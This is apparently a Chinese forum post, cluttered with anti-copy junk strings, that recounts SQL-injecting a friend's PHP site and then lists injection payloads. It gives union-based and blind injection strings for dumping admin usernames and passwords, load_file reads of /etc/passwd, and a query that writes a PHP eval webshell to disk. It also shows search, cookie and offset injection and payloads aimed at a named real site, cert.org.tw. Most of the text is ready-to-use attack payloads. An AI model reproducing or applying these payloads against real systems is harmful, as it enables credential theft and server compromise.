我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~* J8 H" x$ S' P# x2 g* r
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?2 a3 Z7 M! B" w1 b6 \6 `- D
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
. F) a1 y& z# }0 \$ p, G3 ?如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
- ]6 d* R$ a( `% E3 P0 Q/ f, w* {1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)3 U% k" `+ q+ z5 P! X
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
' [" Y- [$ j: U! \Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
. m6 P% T1 l, k. N$ o$ F( \/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
8 O7 c. u) U, j" }( e8 C8 b
- L+ X6 T) r( E1 ~2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
* L) N4 {5 l! g q5 v3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意: G# W! G& |# }3 w
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
; D2 I) C9 D" \# Y8 i, a M5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
8 q4 w; @: j; i. n" w t有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,# x. ~7 d0 D4 H2 |) b
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
" p& k, m- \5 l& s% e: z- D# {我就用的是第二个思路," X" n2 |% q' ~ a
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- 2 J0 G0 s8 m2 X F
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
1 d! l1 ?$ S; R! Z/ ?提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
* Q% P. U* j. _9 D% X注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。 k) W# V* ]+ K: t6 q, F: O
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????8 [$ |) w+ m+ H" O/ m& N4 E
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....' y$ Q4 d. E+ l
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --1 U* k6 ^! f$ g
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
4 c( u/ M7 \8 |; T v, g调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限...... b, @$ f; ]6 S& u) Q; ]9 w
下面是一些很普遍注入方式资料:
5 b+ t5 o( v X/ f# ?注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
& T; k+ j! U& e- k0 ~拆半法
; a! l8 e4 x5 o+ @ I2 W######################################& s; E, e3 O9 _
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
$ I/ d# K& f2 H9 E. f: \8 vand exists (select * from admin)
# I6 _; _. j- B$ K1 a( D4 {and exists(select id from admin)& w5 i* }! x# l0 I
and exists(select id from admin where id=1)
7 V5 ? A! j2 K2 }6 P" Land exists(select id from admin where id>1)
( z N$ c& k1 D3 V' k然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 L3 a# k4 [, ^, g
and exists (select username from admin)( g* Q1 C" Y$ r# O) F" v& |
and exists (select password from admin). V+ C- p6 \* p! f7 i$ K7 i
and exists (select id from admin where len(username)<10 and id=1)
5 t: J+ |1 u( ]6 f; i; iand exists (select id from admin where len(username)>5 and id=1)& u4 ~6 Q0 T: Q P9 v4 l
and exists (select id from admin where len(username)=6 and id=1)
$ W0 F9 d6 z5 e0 Y1 G- fand exists (select id from admin where len(password)<10 and id=1)$ C$ x; h0 X8 n! O9 N3 |
and exists (select id from admin where len(password)>5 and id=1), k7 w. P( Z5 n: m
and exists (select id from admin where len(password)=7 and id=1)
% P: Q/ |6 C, p* C, @) I( aand (select top 1 asc(mid(username,1,1)) from admin)=97
: x* j: Y3 J8 B5 ?3 v返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。4 i* z; `. b4 \" [) B% R
猜第二位把username,1,1改成username,2,1就可以了。
: q) N( q$ \( D! Q [8 p6 m8 P猜密码把username改成password就OK了
8 `6 Z( E: T0 q4 K##################################################
; c$ w5 E$ a. T搜索型注入( |. G) e Z2 K4 A
##################################1 J: J0 L( ~( j6 _/ P2 Q; C
%' and 1=1 and '%'='* K/ S& M0 A3 @9 ?& Z6 N8 N
%' and exists (select * from admin) and '%'='6 Z C6 J; U# m8 o% @
%' and exists(select id from admin where id=1) and '%'='$ x* E4 W6 y% l( W$ `" D
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
+ j$ _' j0 x9 ]1 A m%' and exists (select id from admin where len(password)=7 and id=1) and '%'='# W" g7 z6 o8 v0 J# n/ B
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='. V$ s' L, N! G$ f' A" Y' I2 M
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
8 e. ~5 x8 D i: {; k8 A/ h对于MSSQL数据库,后面可以吧 and '%'='换成--
0 Y' I. z& T5 t% g& B还有一点搜索型注入也可以使用union语句。
9 l# ^4 G! ?+ J4 H########################################################: F# m& f5 ], ]* Z1 G q
联合查询。
4 ^% T1 H- K: {: Y#####################################
8 C0 O5 q3 j# ^9 s& X( P6 k9 Iorder by 10/ {$ k4 {4 T$ w2 J8 ~
and 1=2 union select 1,2,3,4,5,6,7,8,9,10. f0 M8 I+ G( \! i! K6 V4 ]
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin4 N; S' M8 m( o
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1/ d% }; F& E. A1 n/ M) E/ ?
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)( Z: H- P+ x' [; M- j
#################################### C- \( c! N w: z5 p, d
cookie注入$ H. D( w/ F2 [1 J% C5 b1 v
###############################
1 R! q! i/ H! j2 Fhttp://www.******.com/shownews.asp?id=127
0 Y* K$ x4 S3 d1 J2 Khttp://www.******.com/shownews.asp% N$ M+ X1 w f& z& [* }$ v
alert(="id="+escape("127"));
. u) ?& z2 F& X4 {9 W! N( ~alert(="id="+escape("127 and 1=1"));# q" d% N7 c; C/ s
alert(="id="+escape("127 order by 10"));
* g$ O9 ?, u+ V( ]7 }0 L. Ralert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));* M( q* }! u3 H1 F
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));, ]8 a7 v( v- i, U) @
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。2 j/ s. \' \2 X6 c$ k
###################################
& m$ x9 e; ]+ [偏移注入 W$ M# b' _5 B2 B3 n0 Y; W
###########################################################
" m! H7 d# [5 }& [, a: W" lunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
% i& S, T1 N! B: punion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin0 m( Z# ?4 a- b A
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)9 i4 V5 L$ I I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)0 ^2 L! c4 I% G1 j3 B
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
1 I1 c5 `; I/ {' z M2 ^# cunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)0 {8 ?6 ^- X4 }6 r
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
# U7 l* L7 r/ ]3 ]5 C9 Va.id=d.id)$ V. m/ k/ }$ U1 p! q# A
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
5 B( Q0 h" h/ Wand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4 e% X" V7 K0 G' O- r
# b1 Q/ `/ M X) V! p; }============================================================================================================) K; \$ G( z7 ]5 Y) A5 Z( e# h
1.判断版本
2 y. f$ T8 `1 C+ F: \and ord(mid(version(),1,1))>51
9 o8 {) i9 j- s0 q返回正常,说明大于4.0版本,支持ounion查询- i! R) _0 m/ Z/ K5 W4 R7 ]: @
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
- s' o' }9 r. n% E. xand 2=4 union select 1,2,3,4,5,6,7,8,9--( s2 {) F' Z, [* M6 Y3 V t3 s
3.查看数据库版本及当前用户,) R. A3 H5 D, \ [& [0 J5 Z; X% U4 X# u
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
+ p ^( M) N7 u1 S5 W数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,3 W3 l& F& z# i4 W, c
4.判断有没有写权限* C" B8 O; X( ? B3 J
and (select count(*) from MySQL.user)>0-- P, } z4 v6 k! O9 Y2 m) t
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,18 n7 k2 h2 o# a% c) J4 d% G8 G
用不了这个命令,就学习土耳其黑客手法,如下
' _/ e% E4 E5 K4 jand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) ^$ h# |9 v1 _
6.爆表,爆库" C% A# ]9 ~1 x2 s% Z/ S( Q
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
/ Z; ^$ `6 H3 \7 R7.爆列名,爆表) P4 \3 M y* J' [/ a0 k1 B. y
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
- z* A" q% S/ \4 \8 ~1 R- u8 T8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
9 E; g& }* ^& q) p9 iand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
# [* a2 u1 u5 F- R* Q& `' Y9.爆字段内容
! P" H* E e" C' e! w% @and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
: P' s# y4 H3 b# k1 L3 ]- Z* phttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |